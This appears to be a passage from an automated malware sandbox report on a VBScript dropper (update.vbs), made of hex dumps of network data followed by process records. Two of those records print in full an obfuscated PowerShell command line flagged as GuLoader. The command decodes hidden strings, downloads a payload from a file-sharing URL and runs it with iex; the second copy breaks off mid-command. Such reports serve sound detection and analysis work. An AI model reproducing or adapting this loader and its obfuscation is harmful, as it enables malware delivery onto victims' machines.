                                        2024-05-23 16:25:48 UTC15954INData Raw: 02 d3 11 21 16 6f 1d d5 34 48 e5 fb c0 b1 d4 74 1a c8 82 fe 89 cb 5f ad ed a1 9c 67 0c 2b 00 fa 1b 44 b6 b8 91 e7 4d d7 1e 3f fc 71 c3 bd 4d 53 07 c2 ba fe ab a7 da 14 44 f9 7f ab 18 d7 f7 f7 85 ba 17 d2 e6 f3 22 37 92 26 0c c1 97 f4 aa bb 68 c4 23 18 13 9d 3e 1d 4d 39 90 e9 67 2a 3a 44 81 76 40 b9 48 5f f7 36 d4 ba 8b 09 7c 79 69 91 ca c5 85 50 ca d1 35 b7 ad 2d 12 fb 5c 25 c2 f9 72 05 ad 22 23 6d 2b 9a 62 f3 bb e3 8b 96 af f0 89 9e 93 c4 cd 07 1a 73 c1 ce f1 9e da 35 86 d0 cc d2 5f 7d bd b3 f3 e5 c0 51 c3 68 e6 cc ab 9e c9 41 f6 76 20 96 a5 b2 16 94 e6 db ce 51 79 f7 6f 21 cc d1 5a 56 b8 e3 fd 61 11 e6 72 89 69 35 9b bf 4c b9 f0 ad c7 ea 19 27 e4 b0 df ad 48 22 33 4b ab fa 37 1a 54 e4 1c 73 0a ee ee 24 88 cf 3f b2 69 3c 74 f8 42 9f 2d b0 4e 90 1a 96 91
                                        Data Ascii: !o4Ht_g+DM?qMSD"7&h#>M9g*:Dv@H_6|yiP5-\%r"#m+bs5_}QhAv Qyo!ZVari5L'H"3K7Ts$?i<tB-N
                                        2024-05-23 16:25:48 UTC16384INData Raw: d0 4f ff 71 2d 3a 63 de f3 7e 07 a1 8c 7a 71 b4 21 bb 14 9a e7 ca 19 63 24 b6 b4 af cc 6c e1 d2 d7 3b 29 da 14 9b 79 ad cf 6d 1f 5c 31 ef 17 a2 40 6e 1c a9 01 83 12 ba f2 e1 e8 37 66 72 87 f0 de b2 28 0b 76 93 7f 70 0b 2f 3d 59 e4 b3 73 b3 09 8a a7 6a c0 78 ea e1 d0 92 e0 bb 57 aa 7f 36 2f 02 35 b7 cd 18 28 a4 00 58 18 90 42 6a 31 b1 04 df 8d 08 94 2c 67 6f 7c 8f 25 db 5d 27 49 02 a9 5c 35 15 94 c3 53 d7 d8 dd 8c d6 91 c6 a6 d6 23 53 5b ba 4d f6 8e 87 65 ac 9f 2f bd 85 3e 73 e2 24 df 5a 64 57 52 d7 bc 38 8e 3c b8 eb cc 9d 99 d3 f4 e5 ce 45 00 ee ad 01 a9 34 8b 08 44 6b 3b 58 a8 d1 cf b6 f5 19 83 71 80 11 7a 2f d5 8f 7e 04 66 65 84 5c ba 26 d5 13 38 aa ee ac 13 51 b8 af c3 d9 2b fb e4 bf 61 3d 9f 73 fe d1 dc ab f4 95 62 46 42 b0 94 ca 29 10 bb 7b 28 d2 50
                                        Data Ascii: Oq-:c~zq!c$l;)ym\1@n7fr(vp/=YsjxW6/5(XBj1,go|%]'I\5S#S[Me/>s$ZdWR8<E4Dk;Xqz/~fe\&8Q+a=sbFB){(P
                                        2024-05-23 16:25:48 UTC16384INData Raw: c4 85 26 9d d0 35 3d fa 2c 12 5b 0b 25 c2 43 9f 14 ad 2c 3c d9 22 87 14 4a ba 73 11 b6 3f 8a 8a f7 fa 4f ba 76 68 1c fe bd 90 ff a2 59 f3 b9 e0 f3 3d 3e c5 c0 86 8b e0 24 ad 48 db bf 8b 9d f8 2e c5 44 2d 9c 81 ee 73 e6 88 be a2 62 4b d9 0b 4d a0 d1 5a 56 b8 a7 98 0d 74 92 17 ca 1b 5c ef d6 2f d8 9c fe a2 89 6d 4e 8b de df ad 48 6e 56 2a dd 9f 74 68 3d 90 75 10 6b 82 bd 41 eb bb 56 dd 07 3c 74 f8 42 da 43 c4 2b e2 59 e4 f8 a9 f3 ed 95 e8 82 73 3b 0e 25 1e cf 58 12 35 ca c7 68 79 36 56 0f f5 50 ce 74 b5 50 88 d6 df 29 e1 78 14 8d f0 85 d4 16 d8 8a 95 b4 44 b8 17 cf b9 75 89 fd ce c9 fe 6d ce 1f b2 1b ad 3a d8 6b 08 99 46 0b db 48 4d 22 75 f7 0e 2f b7 52 fe 0d 5d 7c f5 2c 88 e6 e6 d1 33 f6 26 7f f7 e8 ac 52 5e 2a 6b f1 91 62 20 62 6b de 4b 93 40 89 46 65 10
                                        Data Ascii: &5=,[%C,<"Js?OvhY=>$H.D-sbKMZVt\/mNHnV*th=ukAV<tBC+Ys;%X5hy6VPtP)xDum:kFHM"u/R]|,3&R^*kb bkK@Fe
                                        2024-05-23 16:25:48 UTC16384INData Raw: 5d 41 73 e5 58 0c f3 93 fe 5d 71 6a 6b 79 18 17 9d 87 92 33 4a 36 f7 a5 07 db e7 b9 42 26 7a e5 91 93 9e dd f8 d5 0d da 72 9d 7f b0 9d 85 a0 d5 54 39 c6 6c 7c e7 9d 12 2f 22 16 68 48 30 91 80 38 cf 0c 50 c9 97 05 e7 d0 e7 d7 8c ac 33 1e c3 bd 2c ca bd bd 99 7f e0 5e c0 c1 c8 76 df bf 3f 70 74 cf 41 7a 9c 4d 92 be 9d d1 6c 20 24 db 9a 9c c7 19 c0 88 d3 b9 54 f0 10 63 a8 d6 35 4e 51 5e 59 59 78 a9 f4 2b 5c 19 ad c3 b6 85 e2 32 9b c9 65 b0 98 0c af 12 de d6 df 00 f1 45 94 00 9c 4c 04 35 5f e0 ee 5b 3f fe 2e 77 7c 11 22 37 d9 40 4f 0e ad e6 08 4f 71 97 bb c2 2b 7f 75 a0 e8 5c 74 54 55 c9 c3 92 b8 ab 8a 90 ca 61 ce df e2 c5 92 f0 74 14 73 1d 42 de 07 6a 8f 2e b6 63 02 8a dd dd 2c db fc 38 39 84 f3 21 de 3c 60 7f 1c d0 af 0e 9d 85 19 93 a3 88 82 84 ce 61 80 fb
                                        Data Ascii: ]AsX]qjky3J6B&zrT9l|/"hH08P3,^v?ptAzMl $Tc5NQ^YYx+\2eEL5_[?.w|"7@OOq+u\tTUatsBj.c,89!<`a
                                        2024-05-23 16:25:48 UTC16384INData Raw: 66 14 2c 1c b6 51 2d be 20 f9 a6 45 4d 7a 1c c6 ac 3c 8f d0 bc c5 49 e2 bc e3 77 45 5a 8d 82 ff d7 ec 85 47 fc c0 ab 91 12 f5 d5 60 9a a5 c6 0c c4 06 a8 60 b9 4c 98 1b f6 25 a7 ba d6 db e8 bc ec c3 34 84 a9 58 fb 1d cc c1 1d 0b 00 0e 54 b3 32 51 13 18 fd e0 4c 01 4e 33 79 29 eb 6e 34 31 5b 4f b0 cf 58 f4 5b 50 e1 c9 a4 35 1c 2d be 41 b2 e4 e6 b8 54 45 96 3a f5 d4 e3 d2 41 fb a9 53 28 eb c2 74 89 3a 87 45 ac 3c 49 4f 61 62 3e 79 c1 9c 08 87 f9 62 62 7d 71 d7 32 7b 4f f5 9d 9c 83 66 a2 a8 da 97 f1 e3 d2 c1 df 6a 6a 68 8f d2 5c 2e 41 ce d2 f1 b6 e4 90 e7 81 a2 3e da e6 d1 39 b5 bd 68 48 f6 a6 6c 48 9b 22 f4 34 4f 0e d5 c4 c2 e3 b2 94 72 e6 f5 ac a7 ee e5 ad fc e7 57 67 b5 03 5e b0 59 18 b9 db d4 59 a4 a3 fc 9d b8 13 b9 b0 db a7 b3 98 da 08 40 89 d4 c4 1f de
                                        Data Ascii: f,Q- EMz<IwEZG``L%4XT2QLN3y)n41[OX[P5-ATE:AS(t:E<IOab>ybb}q2{Ofjjh\.A>9hHlH"4OrWg^YY@
                                        2024-05-23 16:25:48 UTC16384INData Raw: c5 be b9 fd 40 9d 03 cc 83 9b bc 21 b9 ce 4d 87 d2 e8 21 9f 8c 1b 71 7b 35 e8 bf 75 27 ba e4 72 df f6 56 20 64 d8 c3 0e b5 2b 4d a7 ae 83 47 c3 2f 31 e7 69 47 05 56 6a 88 19 de 9a 6c 68 5f b2 0f c1 c3 b4 9e 5e 64 fe 61 47 5c bd 4a 88 24 f5 98 27 cf 21 34 d8 e6 f9 ad e2 a2 a3 08 ac da a7 c1 2e 6c b7 c0 6a 27 01 72 ca bc 62 f4 a7 e9 34 af 19 4a 08 93 c5 23 be 80 c0 77 cb 2e 9e 29 97 6b 49 44 8c 2a 0b 65 bf 89 e5 60 1e 13 cc e3 eb 21 c7 78 13 ee 75 3c bb ea 49 c1 9e 24 98 d3 98 d8 ed 81 ce 47 b7 8c 4d 09 07 a1 94 c9 f8 33 69 19 da a0 76 7c aa 9f fc d2 22 e3 ce e7 e6 a6 87 c9 d2 97 39 41 09 70 34 d1 f7 14 73 95 2c 05 6b 97 df cd 6a 66 7d 9e 10 c8 fa f0 05 47 84 68 6c 3f 2c 42 85 75 5c 15 ae 93 1e 59 58 33 32 53 5c a0 41 ad 44 b6 8c 0f 79 e6 17 8f 22 03 99 29
                                        Data Ascii: @!M!q{5u'rV d+MG/1iGVjlh_^daG\J$'!4.lj'rb4J#w.)kID*e`!xu<I$GM3iv|"9Ap4s,kjf}Ghl?,Bu\YX32S\ADy")
                                        2024-05-23 16:25:48 UTC16384INData Raw: 6c 9d cc 50 68 ce f3 ec 7a a6 dd 35 a7 27 d3 6d a1 2b a4 3c fc 47 2e a8 d8 b3 c1 af 62 94 b4 ff 22 7f 63 1f db 9c aa 37 d6 b4 63 81 44 c9 0e 8c fb 39 bd 99 78 a0 11 b3 90 58 61 1c 88 8c 92 e4 be cf 27 14 cd f4 c6 3a 18 7f ce 56 17 87 aa ff 45 31 ec 0d 1c af c8 e8 a6 cd 4e b5 7e 48 e0 8b b1 07 9f 70 8f a5 c3 c9 3b 1a 90 00 e3 87 5a e0 a9 71 e6 b4 96 40 56 45 6a db 70 59 99 c6 60 08 6b a2 43 5b 86 9f 10 1b 5f 13 30 92 bd 65 7c e1 cf 45 53 0f 7b 57 66 39 da 29 d8 b7 cc 1c 0c 34 bb c9 69 76 88 0f 80 e5 3e 45 2f 94 dc 0d cb d7 79 1d 5c b2 52 64 2b 0e 1e 17 69 f3 bb 46 b7 d2 a3 12 84 03 c7 c1 3a 79 81 3e cd c5 85 63 0a 5c 49 93 99 6d ac c3 94 61 c2 70 8c 31 9d 89 99 7c 87 64 b5 c2 fe 8b 02 e1 b2 24 f9 ee 3d f3 c9 3b 6c 1c a6 bc c6 7a be 7c a7 5c ad 2a 77 5f 9d
                                        Data Ascii: lPhz5'm+<G.b"c7cD9xXa':VE1N~Hp;Zq@VEjpY`kC[_0e|ES{Wf9)4iv>E/y\Rd+iF:y>c\Imap1|d$=;lz|\*w_
                                        2024-05-23 16:25:48 UTC16384INData Raw: ec 77 7a f6 bc da 5c a1 5a 32 2d cc ba 23 53 27 9d 2a 9f 9d b6 d1 21 b5 e2 fa 48 f6 a8 ed 90 7a ed 27 30 f8 87 19 ac 8a 6a 8e 92 99 9b c6 fd af cc 15 bd cd 70 58 2f be fb 5e 99 d9 19 b9 ee da 79 e0 90 54 7b f8 b0 e4 f9 01 4f eb 7e d4 1f 55 4f f4 ae 74 5d f8 3a a3 1b 04 43 11 fb f3 41 d2 4d 14 3b 40 ca 09 2a bb 3b 37 6d 2c 06 05 19 f8 cb 44 72 01 65 ec 38 89 a5 61 af d6 94 e9 26 69 23 cb 99 72 5d 00 a5 0e 88 e7 8c 62 3e ee 08 67 8f 3a 4e f1 b0 5d 18 4b d7 5a 09 f9 ab b2 9e fd 5d 9e 4a f9 18 36 b9 39 3e 38 52 1d 8b ec d3 b2 b1 db 83 5e b3 1e 4a 7a 27 48 d7 10 b7 5a db 2b af 71 ae 2e 87 3f ad ba eb 11 1d 02 f7 25 7b f2 78 d3 9b c3 95 3a 6a 1f 7f 18 ed f8 ec 2b 24 5f 5a 4d 7e 30 61 73 77 74 9f 39 e2 06 6c 11 d5 10 91 01 4d 8d b7 3b 94 66 e7 3d 77 d1 79 a8 ae
                                        Data Ascii: wz\Z2-#S'*!Hz'0jpX/^yT{O~UOt]:CAM;@*;7m,Dre8a&i#r]b>g:N]KZ]J69>8R^Jz'HZ+q.?%{x:j+$_ZM~0aswt9lM;f=wy
                                        2024-05-23 16:25:48 UTC16384INData Raw: 25 5d 45 a8 fc a9 03 7b 45 02 04 d8 59 fc d2 16 c6 43 60 e7 6a 80 55 d6 b6 ce a1 1d 70 19 d0 dc 12 4b 95 18 0b 59 0b b3 39 22 dc f8 d3 36 a4 fa bb 71 bb ba 03 18 35 cb 3e 6f 00 12 71 b0 13 1e 59 0f da de 01 5a f0 a5 52 30 92 c4 6c 19 47 62 ab 8d 2f e6 50 f3 cc ed 09 6b 63 ac 4e c9 8b 06 c6 67 44 d6 05 57 0f 19 14 57 18 b6 dc 14 4d 0f ef 4e 41 8c a5 7a fc 15 95 de f9 b7 92 a8 55 f4 73 50 2a f1 5f 5f ff d7 68 43 ff 44 b1 5b 22 25 1e da 89 5a 03 49 d4 f6 d0 3b 73 ae 50 6a dd 44 fc 22 c0 e3 03 1e a5 83 28 30 23 da a4 0b 1e 1c d5 8c 33 20 cb 5f 4a 66 d8 82 de d9 14 75 06 d7 7e de d0 33 d2 64 ed db 04 37 fe a7 71 55 d5 db a1 da 6f ae ec 55 bd 68 0b cd 6f eb 34 06 dc 4b 24 40 a7 40 6a a1 86 5c 8a 3f c8 05 12 7a 3b bb 14 3c 00 b3 dd 82 c6 2c 20 a0 c5 38 f9 dd 87
                                        Data Ascii: %]E{EYC`jUpKY9"6q5>oqYZR0lGb/PkcNgDWWMNAzUsP*__hCD["%ZI;sPjD"(0#3 _Jfu~3d7qUoUho4K$@@j\?z;<, 8
                                        2024-05-23 16:25:48 UTC16384INData Raw: d4 4c 22 93 57 b9 36 4b 86 cb 07 b8 64 a0 ba 64 83 76 40 31 09 5e 31 77 d6 b9 00 c7 22 90 01 1d 35 3a 0f 14 ee dd 63 3c 5f a5 13 76 0d 25 49 37 96 fc 69 d4 c3 26 74 00 bc 3f 9e bf cd 4d b4 91 b7 e0 77 e0 e9 9f db e3 59 43 c9 0c 8e 7c e3 28 6f a3 6c 95 d3 c4 6e 4c 1f db 52 8f 47 ae d4 97 63 79 3a 30 09 88 02 47 12 1f 17 b1 d8 b9 f2 08 90 de 47 85 7e 42 e1 89 f6 30 40 6b 3c 8c 81 aa 64 40 b3 3a 34 bd 99 29 4f 70 61 62 ab 89 c3 93 cb 49 ab fa bc a3 a0 e6 1c 73 87 a8 ef ad 09 37 3d b2 69 07 84 8e 6f 12 6a b1 c7 11 ee 94 91 dd 71 ac 7f 35 d1 15 58 7a c7 c8 5d 5a 12 35 47 c8 07 99 c3 3f 6d 99 39 8f e1 80 2b 6c e5 b7 c3 01 e8 45 e8 93 7a e9 5d ba 01 5a 5c 3c 29 9a 44 93 9f 2b 38 7e a8 c5 84 ec e7 1b 8d 89 19 26 f0 ef 8c 0e 77 39 5c 49 74 9d 7b bd bf 2b b8 c6 6f
                                        Data Ascii: L"W6Kddv@1^1w"5:c<_v%I7i&t?MwYC|(olnLRGcy:0GG~B0@k<d@:4)OpabIs7=iojq5Xz]Z5G?m9+lEz]Z\<)D+8~&w9\It{+o



                                        Target ID:0
                                        Start time:12:24:55
                                        Start date:23/05/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.vbs"
                                        Imagebase:0x7ff71ea70000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:2
                                        Start time:12:25:02
                                        Start date:23/05/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt 
trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasene (Concolor 'Te ef$UnbesgPartilO ermoAlt rbP.incaPerlul Anti:terneUSa,knnDemi,dO sehe Fermr G nogBegrdr phenuSysken HvepdNine.sEfterhkontorCotypeKlampsjubel=.urerNhexoyeNonpow Feha-OvervOBotchbReseaj ,romeForfecC ouptEfter .ippoSS,ejeyVrdigsOdonttTusineUnambm Arb .TilisNElapie.ensttRusso.varskW.aeone,weakbKnhjeCColorlUnfibi DeraeFllesnFisketNumer ');ratlaasene (Concolor 'M.lle$U,domUOpslanVeer,dMillieH.ster Parag ReporlnpoluAnnulnBogsidGirlesPanteh AkvarKappeeraylisGhane. 
HabiHluckneArisia RapfdSpanseInfelrT,klosTeleo[Ajlef$Si,tpEUdtogg SpinePerianSensoa bandrCofint ulvseGesantBo.casTagli]Ekste=Vinpl$ for.ZSpgefeProb,mcreamaRepa s Klo, ');$Healthiness=Concolor 'NaaleUOmstdn Osted Mi le NedkrHyp,kgForurr Hondu dvksnTembedMonoksLocalhotte r RefoePr.sts F.sk.R.ptuDRe.mbo C,utwUho,onSymbolVerdeo iegaPolead ChreFovenei.omanlOogoneVendi(Phre.$ DespBBitbloc remgI,degbMode iChi,nn Dir,dHypereReallrPerici Ampu,Situ.$SkotsB Civio.jernu ConfgBermmaFrockiGyritn Su,dv Undei Po tlTaintlRethaeMedioaGlbche TrusrSupernFourpeMecha)Frica ';$Healthiness=$Paganish73[1]+$Healthiness;$Bougainvilleaerne=$Paganish73[0];ratlaasene (Concolor 'I ter$Dy,bug,oogolMyxocoCy.nkbFavoraPurdalGunna:Al.ueSCurvenSjokkuTerm rDesulpMuta eBiltynPrefaoKrimit B nde WindrOverts Daad=Rygdk( TartTLaveeeTingss Spi.t Melt-P.ogrPDeempaAd ptt isfuhPeace untur$CrossBTopiaoStam.u Ad.ig MulmaAudioi RegenBanffvE,nyfiTids lFor elPredueSai.taRefereUrocyrForebnpraese edst) Loss ');while (!$Snurpenoters) {ratlaasene (Concolor 'astig$ Diskg N,nmlhymenoJuri b Hydra SwimlSubso: P,riEDyrtikBecalsoply,aAandsm DeteeRammenEnsilsUforeoUmaa rSrkerd Tu nndan kiSchepn.onorgHj,taeKulturVisuasPrinc= N,bi$AnalstU.smyrKasteuEkphoeKruse ') ;ratlaasene $Healthiness;ratlaasene (Concolor 'Pa laSMa edtVentiaVildsrStyrkt Circ- gyptSFynsklUncateAtel,e Res,pCrev. 
Dia.4Fj rb ');ratlaasene (Concolor ' ,amm$ HydrgMglinlBrilloPlanebJacobaReocclpen.e: NighSGra,snO aliuTrosbrMinidpPredeeFolkenk,udeoCo,not RelieamtsprH,lias Omb =Kante(CirkuTJhooleBrasqsNyvlgtBonde-allaeP kelta H,det ClimhLegis Trol$ ForbBHeathoBrutuuPavagg elvhaInteriSue fn Bon vDobb iPhyselH.perlConiaeLandfaUnaideMaa erUddatnMantbeServo)Afsva ') ;ratlaasene (Concolor ' onol$Snobbg GanslUnexpoModulbStretaVenchlMeldi:ObeliBOrdinrS,kunuEyrfig lokseNon.orFl veeCobblr Betrf NoreaHennarPortii,aglinDiskegEnsfoe Gr,tr Rhil=Defib$BacksgMundgl outioDam,bbTelefaBrainlSemis:Fy reHHjemloBuni.r Huggtvaishe VolknPre e+Infol+ Rout% Serv$GuiltJTri.euMiljpb Grouip,psilGangbaFjlentUdlbsoPennyrameriyUnr,p.SemihcEneb,odeva.u AdrenPlanetStucc ') ;$Bogbinderi=$Jubilatory[$Brugererfaringer];}$Swimsuit=280753;$Differentialforstrker=28374;ratlaasene (Concolor 'Gamb $Gu sbgbl,dml rugeo P oebGramma To mlBridg: Ov rSDaavitSkildoInforrAdvokmChalkfV.gnmu Fr.olCaterdM,xtueInlea lod=,nter StrikGVurdeeUnsertQ,int-BicreC frilore.elnKipfetSandaePe,rinSto mtRekr, Antig$ ChroB KantoTaphruFo fjg Supea,olysi GharnFllesvIcticiKanonl Bl.sl F rue,osenaPundieHaar.rBagsln P,eaeBrndg ');ratlaasene (Concolor ' ,gri$ NeurgComicl DispoHardfbEnkeraCamoulCelib: CheeSBoudeh ,ensaSolutnBrankt SyssuMundsnC trugLuxur Eueme=Riv,r P,rma[L aveSRev,lySter,sSchiztHj,ste Tambm Enk.. ,pgeCCalyco ppelnStdtevUnsloeBi,anrRac,dt Nive]Semmy:Verts:IndhsFMou,nrUnsooo .rmlmCtrlbBSve,sa IrrisS tteeT,etu6Natte4LakfeSguvactIndrerSaloniHypotnChampgEpony( orge$kopieS ngratProt.o Resur BrndmLirasf Yaplu agrelMi.cldCr,wbeCh ri) Ensp ');ratlaasene (Concolor ' ,ver$Subchg Ja,blBioreoAm.dob Tekia P ell ,ils: pksSWi,dokEringoLop,or,ewrapSkabeeDd,stdFabrieR fugs C ar .mphi= pro. 
sight[ DesiSPanteyOver,s KoektZanziesvovlmBowdl.Sk.llT slasePo sexUdkobtbarmh.,edbrEStddmn folkcAfsttofiskedBindiiEld,rnOgre gScaff]Ponde:Aftal:G,aehATrochSElek CBerolIW,ittIKldni.QuestG P.yteFarvetBje.gSS miht hilrNonsuiBo.arnHospigFrave(Vir.u$ UbetSR,conhR tteaFr msnScoottAppe.u ryptnrequeg He,a)B,sla ');ratlaasene (Concolor 'Kamph$ ind.gOrganlbib loHip,ib couta Kamflemmer:Hir,nL,angvoDe,pekVestua.ntrulSkonsiPleursAnklaeBrne,r PartiBorn n MontgSemim= .egi$KilopSBaglikLumutoTrosfr P etpPaahnePubisd ResteApplisMarty.Ani.as.xcuruGnar,b Texss se,vt,jaktrOutthiReisan.hegegCe la( arad$StagnSAdornwsun,iiFi,zcm M,sksNevusuForumiSpredt cre,dragl$proteDOceani llesftick.fViatoeTrrehrDampbenebulnBestrtTerciiK lopaAvnerlBrystfb drvo V lurColacsF aeltB aavr Len.kBronkeSpirorSuper)Herre ');ratlaasene $Lokalisering;"
                                        Imagebase:0x7ff7be880000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2737781412.0000026F3F960000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:12:25:02
                                        Start date:23/05/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:12:25:04
                                        Start date:23/05/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $"
                                        Imagebase:0x7ff61d6d0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:12:25:12
                                        Start date:23/05/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt 
